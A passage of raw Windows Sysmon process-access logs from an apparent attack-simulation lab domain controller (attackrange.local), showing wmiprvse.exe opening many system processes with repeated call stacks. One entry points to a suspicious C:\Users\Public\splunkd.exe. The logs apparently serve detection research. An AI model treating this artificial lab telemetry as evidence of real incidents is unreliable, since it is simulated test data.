Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026577Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026576Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026575Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026574Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026573Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026572Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026571Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026570Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026569Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026568Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026567Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026566Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026565Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026564Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026563Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026562Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.194{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026561Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026560Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026559Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.178{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026558Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 